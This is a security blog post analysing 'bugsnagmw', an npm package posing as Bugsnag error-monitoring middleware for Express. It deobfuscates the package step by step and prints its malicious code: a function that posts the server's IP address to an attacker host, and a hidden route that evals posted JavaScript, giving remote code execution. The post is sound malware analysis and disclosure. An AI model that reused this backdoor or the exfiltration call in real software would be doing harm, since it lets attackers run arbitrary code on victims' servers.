Trusty, Stacklok’s free-to-use service that evaluates open source packages for supply chain risk, recently flagged JavaScript malware published to the npm package registry. The package in question, “bugsnagmw,” contained obfuscated code and partial URLs, and was capable of opening a shell in the victim's application server for an attacker to exploit.
Trusty is Stacklok’s free-to-use service that evaluates open source packages for supply chain risk. As part of our mission to identify healthy packages, and to warn users about malicious packages, we recently re-architected Trusty’s “package ingestion pipeline” to break it into modular components. This refactoring significantly increased its speed, but also allowed us to “shift left” some of our automated package analysis into a system we call the Trusty Threat Pipeline.
The increased speed of our ingestion pipeline, combined with earlier, and faster, package analysis allows us to flag suspicious packages to our security research team as quickly as possible. Now researchers can start analyzing potentially harmful packages within minutes of being published, instead of the industry-standard hours, or even days. This lets us identify and report harmful packages incredibly quickly, meaning that we can give you more information to make good decisions about the packages that you’re using before they become a problem for you.
Since we rolled it out, the Trusty Threat Pipeline has flagged several packages, which we’ve responsibly disclosed to the package registries. Most of them were straightforward (often variations on a dependency confusion or typosquatting attack), but one was particularly nasty. This package was advertised as useful middleware for an Express web application, specifically a middleware to perform error monitoring, but in fact it opened a shell in your application server for an attacker to exploit.
This is exactly the sort of package that we built the Trusty Threat Pipeline to identify – and we think that this particular package is a very interesting example. So we thought that we’d share our analysis. In this post, we’ll look at why the Trusty Threat Pipeline flagged this package, some of the techniques used to avoid detection, and our final analysis of what the package does.
Almost immediately after being published on Thursday, March 21, 2024, Trusty flagged the bugsnagmw package so that our security analysis team could investigate it. Trusty analyzes packages on multiple dimensions, and this package was given a low Trusty Score because:
The package did not have a legitimate source of provenance. Trusty looks at either signed provenance data from sigstore, or historical provenance data, to help identify the source of origin for a package. This helps us ensure a package’s authenticity and integrity.
The package had a very low activity score. Trusty looks at the activity of a package author, as well as activity in a package’s source repository, to help identify high and low-quality packages.
The package had a similar name to an existing popular package, representing a possible typosquatting attack. Trusty analyzes naming similarity across a package registry to help identify when people are attempting to gain installs through mistakes or misdirection.
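Trusty’s actual similarity analysis isn’t described here, but edit distance is one simple, common way to measure how close two package names are. The following is a minimal sketch under that assumption; the editDistance and lookalikes helpers, the short list of “popular” names, and the threshold of 2 are illustrative choices, not Trusty’s.

```javascript
// Classic Levenshtein edit distance: the minimum number of single-character
// insertions, deletions, or substitutions needed to turn a into b.
function editDistance(a, b) {
  // prev[j] holds the distance between the first i-1 chars of a and first j chars of b
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Hypothetical check: which popular names is `candidate` suspiciously close to?
// An exact match (distance 0) is the popular package itself, so it is excluded.
function lookalikes(candidate, popularNames, maxDistance = 2) {
  return popularNames.filter((name) => {
    const d = editDistance(candidate, name);
    return d > 0 && d <= maxDistance;
  });
}

const matches = lookalikes('bugsnagmw', ['bugsnag', 'express', 'axios']);
// matches is ['bugsnag']
```

Here bugsnagmw is two edits (appending m and w) away from bugsnag. A real check would need a far larger list of popular names and some tolerance for legitimate, similarly named packages.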
In addition to having a low Trusty Score, this package had other red flags: the package contained string constants with partial URLs, which suggests that it could be making external API calls to endpoints. More notably, the package contained obfuscated code, which suggests that the author is attempting to hide its actual behavior.
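Both red flags can be approximated with simple pattern matching. The sketch below is a hypothetical heuristic, not Trusty’s implementation: it counts distinct _0x-style identifiers (typical of javascript-obfuscator output), collects string literals that begin with http:// or https://, and notes whether eval is called. The redFlags name and the sample input (built from fragments of the bugsnagmw string table) are ours.

```javascript
// Hypothetical red-flag heuristics for a package's source text.
function redFlags(source) {
  // Identifiers like _0x1a2b3c; \b keeps us from matching inside longer names
  const hexIdentifiers = new Set(source.match(/\b_0x[0-9a-f]+\b/g) || []);
  // Quoted string literals that start a URL (possibly only a fragment of one)
  const urlLiterals = [...source.matchAll(/(['"])(https?:\/\/[^'"]*)\1/g)].map((m) => m[2]);
  return {
    hexIdentifierCount: hexIdentifiers.size,
    urlLiterals,
    usesEval: /\beval\s*\(/.test(source),
  };
}

const sample =
  "const _0x11173f = ['i.ipify.or', 'https://ap', 'http://172'];" +
  ' function _0x5808() { return _0x11173f; }';
const flags = redFlags(sample);
// flags is { hexIdentifierCount: 2, urlLiterals: ['https://ap', 'http://172'], usesEval: false }
```

Signals like these are noisy on their own (plenty of legitimate bundled code contains URLs), so they work better as prompts for human review than as verdicts.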
As a result of this, the Trusty Threat Pipeline flagged this package to our researchers for further analysis.
When we first looked at the package, it was clear that it had indeed been obfuscated with the powerful javascript-obfuscator tool to make analysis difficult. Even in the npm registry’s code browser, the package’s script is a single dense block of code.
You can quickly see that the script has had its whitespace removed, but this goes beyond typical minification. Function and variable names have been replaced with names made up of _0x followed by hexadecimal digits (e.g. _0x122a47), making it difficult to read the code and track its logic flow.
The team at Stacklok actually sees a fair number of these packages, obfuscated in this way to hide their intent. Understanding the true nature of these packages is critical in risk evaluation. Here’s how we approached deobfuscation and analysis of this particular package.
In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand.
—Wikipedia
As always, Wikipedia puts it succinctly with a nice TL;DR. If you’re interested in learning more about code obfuscation, read on.
Code obfuscation transforms readable code into a form that’s difficult for the human eye to follow, while preserving its original functionality. It is painful to read by design; brain pain a-plenty is the whole point. The technique is sometimes used to protect intellectual property by making code challenging to reverse engineer, but in our case we’re looking at it being employed by attackers.
Obfuscation is not a single thing; it’s a grouping of techniques. Variable and function names are often renamed to hexadecimal-looking identifiers (e.g. _0x291b). Algorithms are restructured into unusual flow patterns. Characters and strings are often stored in arrays and reconstructed through index lookups, with the indices written as hexadecimal literals rather than ordinary integers (known as “Array Shuffling”). Attackers often use this to conceal malicious URLs, as we found in bugsnagmw.
Just to show how nasty obfuscated code is to read, let’s abuse one of the simplest code examples on the planet, “hello world”.
console.log("Hello, World!");
Even the most beginner of programmers will be able to decipher what is happening above: print “Hello, World!”, job done!
Let’s now obfuscate the code of our simple Hello World into a pile of horrible syntax vomit:
var _0x291b=['log'];
(function(_0x4bd822,_0x2bd6f7){
var _0x1a0f3a=function(_0x5a5d3c){
while(--_0x5a5d3c){
_0x4bd822['push'](_0x4bd822['shift']());
}
};
_0x1a0f3a(++_0x2bd6f7);
}(_0x291b,0x1b3));
var _0x4bfb=function(_0x2d8f05,_0x4e08d5){
_0x2d8f05=_0x2d8f05-0x0;
var _0x4d74e5=_0x291b[_0x2d8f05];
return _0x4d74e5;
};
var shuffledArray = ['o', 'l', 'd', '!', 'W', ' ', 'H', 'e', 'l', 'l', 'r', 'o'];
function decodeChar(code) { return String.fromCharCode(code); }
function unshuffleArray(array) {
return [
decodeChar(0x48), array[parseInt('111', 2)], array[0o10], array[0b1001],
array[0x0], decodeChar(0x2c), decodeChar(0x20), decodeChar(0x57), array[0xb],
array[parseInt('1010', 2)], array[0x1], decodeChar(0x64), decodeChar(33)
].join('');
}
console[_0x4bfb('0x0')](unshuffleArray(shuffledArray));
Ugh! Right? Nasty!
So what did we do here? The main goal was to make it a challenge to reconstruct the string “Hello, World!”. We did this with what resembles a typical index-based lookup into an array of characters, but with a few different formats thrown in to make it particularly hard to follow. The indices are a mix of hexadecimal (0x...), binary (0b...), and octal (0o...) literals, plus values parsed from binary strings (parseInt('...', 2)), and some characters skip the array entirely and are built from character codes with String.fromCharCode. This makes it much harder to correlate indices with their positions. We also employ a self-invoking function that takes two parameters. It rotates the initial array by repeatedly shifting an element off the front and pushing it onto the back, although, with only one element, the array remains unchanged. This step adds a layer of extra nastiness without altering functionality. Finally, even the name of the log method is fetched from that array through a lookup function, _0x4bfb, rather than written directly.
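If the notation is the hard part, evaluating each piece on its own helps. This short sketch (the variable names are ours) shows that every index form in the example is an ordinary integer, what the character codes decode to, and that the self-invoking function’s 435 rotations leave a one-element array untouched.

```javascript
// Every index used in the obfuscated example is an ordinary integer in disguise
const indices = [parseInt('111', 2), 0o10, 0b1001, 0x0, parseInt('1010', 2), 0x1];
// indices is [7, 8, 9, 0, 10, 1]

// Characters built directly from character codes, bypassing the array
const fromCodes = [0x48, 0x20, 0x57, 0x64, 33].map((code) => String.fromCharCode(code)).join('');
// fromCodes is 'H Wd!'

// The self-invoking function receives 0x1b3 (435), pre-increments it to 436,
// and its while (--n) loop then runs 435 times. Each iteration moves the
// first element to the back, which for a one-element array changes nothing.
const single = ['log'];
for (let n = 435; n > 0; n--) single.push(single.shift());
// single is still ['log']
```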
This is similar to what the javascript-obfuscator package has done to bugsnagmw. Let’s analyze it step by step.
The first step in analysis is simply making the program readable at all, which means reformatting it. Once we did that, this function jumped out at us:
function _0x5808() {
const _0x11173f = ['237054jeHhqw', '1834161FfqVqh', 'i.ipify.or', 'tOPbR', 'NmUMH', '210804RGvmIx', 'sSyII', '6379304IXNDzu', '4237008NTmesW', 'g?format=j', '18hEBkiY', 'post', '.24.42.1', '4GGrSjt', 'ETxAC', '11333280pUxuCJ', 'VsuQj', 'express', 'IJGiK', 'return\x20\x27a\x27', 'EijpY', 'get', 'ZOvjL', 'bugsnag', '/pproperty', 'body', 'son', 'http://172', 't\x27);\x0a//\x20\x20\x20', 'setTimeout', 'axios', '/scrappedd', 'catch', 'lXgvx', 'console.lo', '602929MJubhw', 'g(\x27Run\x20tes', 'jEHcf', 'kUiFu', 'sqJsh', 'https://ap', 'send', '7:9999/mh', '35WCGHrh', 'use', 'Router', ';\x0a\x20\x20', 'YBayv'];
_0x5808 = function() {
return _0x11173f;
};
return _0x5808();
}
It’s clearly a string lookup table, containing fragments of string constants. The control flow is somewhat obfuscated, too: at first glance, one might think that it gets itself into infinite recursion, where _0x5808 calls back into itself. In fact, this is another obfuscation technique: on its first call, the function overwrites its own name, _0x5808, with an anonymous function that returns the string table, then invokes that replacement. So ultimately this function simply returns the string table, and every later call goes straight to the replacement. (Note: a publicly accessible IP address in the lookup table above has been redacted and changed to a reserved IP address.)
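The self-replacing trick is easier to see with readable names. In this sketch, getTable is a hypothetical stand-in for _0x5808 with a shortened table: the first call builds the table, swaps in a function that returns it, and calls that; later calls return the same array without rebuilding it, and there is no infinite recursion.

```javascript
// Hypothetical readable version of the _0x5808 pattern
function getTable() {
  const table = ['express', 'axios', 'get']; // shortened for illustration
  // Overwrite our own binding so later calls skip this setup entirely
  getTable = function () {
    return table;
  };
  // Calls the replacement, not this original body, so the "recursion" ends here
  return getTable();
}

const first = getTable();
const second = getTable();
// first === second is true: both calls return the very same array
```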
Understanding this function is an important first step, but where is it used? The answer is this crucial function at the bottom of the script, whose first action is to call the _0x5808 function that returns the string lookup table:
function _0x4cfd(_0x42ad4b, _0x44de92) {
const _0x5582da = _0x5808();
return _0x4cfd = function(_0x10efd3, _0x2ab9c3) {
_0x10efd3 = _0x10efd3 - (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd);
let _0x46636f = _0x5582da[_0x10efd3];
return _0x46636f;
}, _0x4cfd(_0x42ad4b, _0x44de92);
}
But what else is going on? This function is incredibly hard to read with all the hexadecimal digits, and it also contains a function within a function, unused parameters, and the relatively uncommon comma operator.
The first step of deobfuscation is to remember that expressions like 0xe9 and 0x21 are numeric literals (constants, albeit written in hexadecimal), while anything with a leading underscore is an identifier: the name of a function or a variable, chosen to look like _0x4cfd so that it is difficult to read and scan quickly. We can rewrite this function by simplifying the hexadecimal constant arithmetic (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd, which evaluates to 399), removing the unused parameters (_0x2ab9c3, and therefore _0x44de92 as well), and collapsing the inner function, which _0x4cfd installs in place of itself and then immediately calls. This gives us a function that’s a lot simpler:
function _0x4cfd(idx, _unused) {
const lookup_table = _0x5808();
return lookup_table[idx - 399];
}
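The constant arithmetic that disappeared in the simplified version is easy to check by evaluating it directly. In this sketch, offset and tableIndex are hypothetical names for the pieces of the index computation inside _0x4cfd.

```javascript
// The offset inside _0x4cfd is plain constant arithmetic on hexadecimal literals
const offset = 0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd;
console.log(offset); // 399

// Hypothetical helper: the table index that a lookup argument maps to
const tableIndex = (arg) => arg - offset;
console.log(tableIndex(0x1ab)); // 28 (0x1ab is 427 in decimal)
```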
Now things are starting to come together, and we can look for uses of this string lookup function. The first place we see it is in the very first statement in the function: const _0x122a47 = _0x4cfd. That creates an alias, so we need to look for _0x122a47 as well. This leads us to a require statement, which is very important for understanding what other functionality this script uses:
const express = require(_0x122a47(0x1ab)),
Now we have a call to our string table lookup function, passing in a value of 427 decimal (0x1ab hexadecimal). Our string table lookup function subtracts 399, giving us index 28 into the string array, meaning that our require statement is trying to load a module named… ”t\x27);\x0a//\x20\x20\x20”.
That’s probably not what you want.
This package pretty clearly isn’t trying to load a module with a mangled name like that. In fact, given the name of the variable, and the fact that the string constant express is actually in our lookup table, we expected that this would be trying to require("express").
More analysis revealed that this nasty little function is doing a lot of heavy lifting:
(function(_0x19b533, _0x3a14dd) {
const _0x491cff = _0x4cfd,
_0x2dcd82 = _0x19b533();
while (!![]) {
try {
const _0x2e6977 = -parseInt(_0x491cff(0x1bd)) / (0x156d + 0x1569 + -0x2ad5) * (-parseInt(_0x491cff(0x1a7)) / (0x1 * 0x2112 + -0xe * 0x1ea + -0x644)) + -parseInt(_0x491cff(0x19f)) / (-0x1 * -0x19d3 + -0x425 * -0x5 + -0x2e89) + parseInt(_0x491cff(0x1a2)) / (0x10d * -0x11 + 0x1 * 0xa7d + 0x764) + -parseInt(_0x491cff(0x195)) / (0x4 * 0x8a6 + 0x7 * 0x439 + 0x4022 * -0x1) * (-parseInt(_0x491cff(0x19a)) / (-0xbb9 * 0x1 + -0x1f2b + -0x6 * -0x727)) + -parseInt(_0x491cff(0x19b)) / (0x4a2 * 0x4 + 0x18fb + -0x1fa * 0x16) + parseInt(_0x491cff(0x1a1)) / (0x1b6b + -0x26f7 + 0xb94) + -parseInt(_0x491cff(0x1a4)) / (-0x261b + -0x20cb + 0x46ef) * (parseInt(_0x491cff(0x1a9)) / (0x1d4c + 0x1d * 0xbf + -0x32e5));
if (_0x2e6977 === _0x3a14dd) break;
else _0x2dcd82['push'](_0x2dcd82['shift']());
} catch (_0x1ea857) {
_0x2dcd82['push'](_0x2dcd82['shift']());
}
}
}(_0x5808, -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee));
Now we’ve seen a lot of these techniques in our prior analysis: we’ve got functions within functions, arithmetic of hexadecimal constants, and variables named to look a lot like those same constants.
But we’ve also got some interesting new control flow obfuscation. First, while (!![]) { … } is an interesting way to loop. An array object, even an empty one, is truthy in JavaScript, so ![] is false. It’s not common to see in JavaScript, but you can put two exclamation points together for a negation of a negation, so !![] is true. That means while (!![]) { … } is ultimately equivalent to while (true) { … }.
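A quick check of the double negation, in a few lines you can paste into a Node.js REPL or a browser console:

```javascript
// Every object is truthy, including an empty array
console.log(Boolean([])); // true
console.log(![]);         // false: negating a truthy value
console.log(!![]);        // true: negating it again
// For contrast, an empty string is falsy
console.log(!!'');        // false
```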
On each iteration, this odd-looking statement runs:
_0x2dcd82['push'](_0x2dcd82['shift']());
First, we need to trace back through the code and understand that _0x2dcd82 is our string lookup table array: it’s the result of calling _0x19b533, which is the _0x5808 function passed in to this function. Second, we need to remember that in JavaScript, methods are just properties on an object, and you can use either dot notation or bracket notation to access them. In other words, _0x2dcd82['push'](_0x2dcd82['shift']()) is equivalent to _0x2dcd82.push(_0x2dcd82.shift()). This means that on each loop, the string lookup table is rotated: the first element is shifted off the front of the array, and then pushed onto the back of the array.
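To see both points concretely, here is the loop body applied once to a hypothetical three-element table (the name lookupTable is ours):

```javascript
const lookupTable = ['a', 'b', 'c'];

// Bracket notation reaches the very same method as dot notation
console.log(lookupTable['push'] === lookupTable.push); // true

// One iteration of the obfuscated loop body: rotate left by one
lookupTable['push'](lookupTable['shift']());
// lookupTable is now ['b', 'c', 'a']
```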
The loop’s exit is actually controlled by calling parseInt on various entries of the string lookup table and combining the results with arithmetic on the hexadecimal constants; the loop breaks once that result equals the target value passed in as the second argument. This is particularly difficult to reason about, since the string table is being mutated on every iteration. But ultimately, the lookup table is rotated in this way 37 times, and our string lookup table ends up looking like this:
[
'jEHcf', 'kUiFu', 'sqJsh',
'https://ap', 'send', '7:9999/mh',
'35WCGHrh', 'use', 'Router',
';\n ', 'YBayv', '237054jeHhqw',
'1834161FfqVqh', 'i.ipify.or', 'tOPbR',
'NmUMH', '210804RGvmIx', 'sSyII',
'6379304IXNDzu', '4237008NTmesW', 'g?format=j',
'18hEBkiY', 'post', '.24.42.1',
'4GGrSjt', 'ETxAC', '11333280pUxuCJ',
'VsuQj', 'express', 'IJGiK',
"return 'a'", 'EijpY', 'get',
'ZOvjL', 'bugsnag', '/pproperty',
'body', 'son', 'http://172',
"t');\n// ", 'setTimeout', 'axios',
'/scrappedd', 'catch', 'lXgvx',
'console.lo', '602929MJubhw', "g('Run tes"
]
After shuffling, index 28 is actually express, so our require statement does become the expected const express = require("express").
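Because the divisor expressions in the exit condition all fold to small constants (they evaluate to 1 through 10, in order) and the target passed in as the second argument evaluates to 740139, the loop can be reproduced in readable form. The sketch below is our reconstruction, not code from the package: the names stringTable, lookup, checksum, and unrotate are ours, and unlike the original while (!![]) loop it gives up after one full cycle instead of spinning forever.

```javascript
// bugsnagmw's string lookup table, in the order _0x5808 returns it
// (IP fragments as altered in the listing above)
const stringTable = [
  '237054jeHhqw', '1834161FfqVqh', 'i.ipify.or', 'tOPbR', 'NmUMH',
  '210804RGvmIx', 'sSyII', '6379304IXNDzu', '4237008NTmesW', 'g?format=j',
  '18hEBkiY', 'post', '.24.42.1', '4GGrSjt', 'ETxAC',
  '11333280pUxuCJ', 'VsuQj', 'express', 'IJGiK', 'return\x20\x27a\x27',
  'EijpY', 'get', 'ZOvjL', 'bugsnag', '/pproperty',
  'body', 'son', 'http://172', 't\x27);\x0a//\x20\x20\x20', 'setTimeout',
  'axios', '/scrappedd', 'catch', 'lXgvx', 'console.lo',
  '602929MJubhw', 'g(\x27Run\x20tes', 'jEHcf', 'kUiFu', 'sqJsh',
  'https://ap', 'send', '7:9999/mh', '35WCGHrh', 'use',
  'Router', ';\x0a\x20\x20', 'YBayv',
];

// Simplified _0x4cfd: the offset arithmetic evaluates to 399
const lookup = (table, arg) => table[arg - 399];

// The loop's exit expression, with each hexadecimal divisor folded to its value
function checksum(table) {
  const n = (arg) => parseInt(lookup(table, arg));
  return -n(0x1bd) / 1 * (-n(0x1a7) / 2) + -n(0x19f) / 3 + n(0x1a2) / 4 +
    -n(0x195) / 5 * (-n(0x19a) / 6) + -n(0x19b) / 7 + n(0x1a1) / 8 +
    -n(0x1a4) / 9 * (n(0x1a9) / 10);
}

// Second argument of the self-invoking function
const TARGET = -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee; // 740139

// Rotate a copy of the table until the checksum matches, counting rotations
function unrotate(table, target) {
  const t = [...table];
  for (let rotations = 0; rotations < t.length; rotations++) {
    if (checksum(t) === target) return { table: t, rotations };
    t.push(t.shift());
  }
  throw new Error('checksum never matched');
}

const { table, rotations } = unrotate(stringTable, TARGET);
console.log(rotations);            // 37
console.log(lookup(table, 0x1ab)); // express
```

Before any rotation, lookup(stringTable, 0x1ab) returns the mangled t');\n// fragment; after the 37 rotations the same lookup returns express, matching the analysis above.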
Now that we’ve seen all these techniques, we can start to simplify the script to get to the business logic that’s been obfuscated. We can remove the functions-within-functions, turn calls into our string lookup table back into simple string constants, and simplify the logic so that we can understand it. What we’re left with is some interesting behavior.
After deobfuscation, this is the first function in the package:
async function pst_inf() {
try {
let ip_results = {};
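try {
// look up the public IP address of the machine this code runs on
let { data: data } = await axios['get']('https://api.ipify.org?format=json');
ip_results = { ...data };
} catch (e1) {}
// report the collected IP address to the attacker's server
await axios['post']('http://172.24.42.17:9999/mh', ip_results);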
} catch (e2) {}
}
This function makes a call to api.ipify.org to discover the public IP address of the machine that this package is running on, then POSTs the result to an attacker-controlled system at [redacted-ip].
(We redacted this IP address; in the original package, it belongs to a machine hosted by a popular cloud provider.)
Sometimes packages do this sort of IP address notification just to “prove” that they were installed; this is common in the dependency confusion examples that we’ve shown before. But as we continue to analyze this package, we discover that, for this attacker, knowing the IP address is actually valuable.
Again, this package claims to be Express middleware, so analyzing it requires understanding a bit more about how middleware is configured and used. A middleware package exports a function, and our bugsnagmw package does exactly that:
exports['bugsnag'] = st2;
A victim would install this middleware into their application like this:
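const express = require('express');
// the malicious package (since removed from npm), shown for illustration only
const bugsnagmw = require('bugsnagmw');
async function main() {
  // create our Express application
  const app = express();
  // add the bugsnag middleware to our application
  await bugsnagmw.bugsnag(app);
  // add a default route, and listen on port 4242
  app.get('/', async function(req, res) { res.sendStatus(418); });
  app.listen(4242);
}
main();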
When a victim follows this pattern to install this middleware into their application, the attacker’s middleware export function (in this case, st2) will be called with the victim’s Express application as an argument.
The setup for this attack happens during middleware installation, in the st2 function:
async function st2(app) {
const router = express.Router();
router.post('/scrappedd',
increaseTimeoutMiddleware(600000),
catchAsync(async (req, res) => {
res.send(await run(req, res));
})
);
await app.use('/pproperty', router);
pst_inf();
}
This function takes the Express application that the victim provided, and creates a new Express Router to add to it. The new router has a single POST route, /scrappedd, which first passes through the increaseTimeoutMiddleware function (called with 600000) but, more importantly, calls the run function with the web request and response objects. The function then mounts that new router on the victim’s application at the /pproperty path, and finally calls pst_inf to report the server’s IP address back to the attacker.
If you’re not familiar with Express routing, this means that the attacker has now added a route to the victim’s application: POST requests to the application at /pproperty/scrappedd will call the attacker’s run function.
The attack itself is in the run function. It simply evals whatever JavaScript is POSTed to it in the js field of the request body:
async function run(req, res) {
return eval(req.body['js']);
}
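Because this is a direct call to eval, the posted string runs as code inside the handler itself, with the same access as any other code in the server process. The harmless sketch below uses a hypothetical runSketch function shaped like run (without the async keyword or the response object) and a plain object in place of an Express request.

```javascript
// Hypothetical, harmless stand-in for the malicious run() handler.
// The request object is assumed to already have a parsed `body`.
function runSketch(req) {
  const secretInScope = 'visible-to-eval';
  // Direct eval: the string is executed as code in this function's own scope
  return eval(req.body['js']);
}

console.log(runSketch({ body: { js: '1 + 1' } }));          // 2
console.log(runSketch({ body: { js: 'secretInScope' } }));  // visible-to-eval
console.log(runSketch({ body: { js: 'typeof process' } })); // object (under Node.js)
```

A real payload is not limited to expressions like these; anything the Node.js process can do, such as reading environment variables through process.env, is within reach.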
Putting these pieces together, this means that if you install this package as middleware in your Express application, and the attacker can access your server because it’s publicly available, then they can run arbitrary code on it.
We created the Trusty Threat Pipeline to flag potentially malicious packages to our security analysts at Stacklok as quickly as possible. Speed is critical: the faster we identify malicious packages and report them to the package registries, the sooner they’re removed and stop posing a threat to users.
Unfortunately, moving this quickly means that we don’t let the attack develop, so we don’t always get to fully understand exactly what the attacker’s goals were with a package, or who the target was. We saw that this attacker was refining this package, making subtle improvements in new versions, right as we were doing the analysis. So they were stopped while still in the development stage, before they were able to leverage the attack.
What we do know is:
An attacker published a package that is middleware for the Express web application framework.
The package claims to report bugs to the popular error monitoring platform, Bugsnag, but in fact it sets up a new route into the victim’s web application.
When the victim starts their application, it will ping back to the attacker with the IP address of the web server.
The middleware sets up a new route at /pproperty/scrappedd. When called, that route accepts a POST payload containing JavaScript, which the middleware then executes. With this set up, and with the victim’s IP address in hand, the attacker can call into the victim’s web application and execute arbitrary code.
Shortly after discovering this package, we notified the GitHub Trust & Safety team and they removed it from the npm registry. In addition, during analysis, we identified that the host that received IP address reports had outdated server software running, suggesting that it had been compromised by the attacker. We reported this to AWS and the server is no longer operating.
Although it would be interesting to understand who the target of this attack was and observe it unfold, along with its ultimate goals, we’re happy to keep that as an unanswered question and put the protection of others first. We’re very satisfied that the Trusty Threat Pipeline caught this package so promptly, while the attacker was still in the development phase, and before they were able to start leveraging it as an attack.
Luke Hinds
CTO
Luke Hinds is the CTO of Stacklok. He is the creator of the open source project sigstore, which makes it easier for developers to sign and verify software artifacts. Prior to Stacklok, Luke was a distinguished engineer at Red Hat.
Edward Thomson
Product Manager
Edward is a product manager at Stacklok, overseeing product strategy for Stacklok's products, Minder and Trusty. Prior to Stacklok, he was Director of Product Management at Vercel, and a product manager at GitHub focused on GitHub Actions and npm.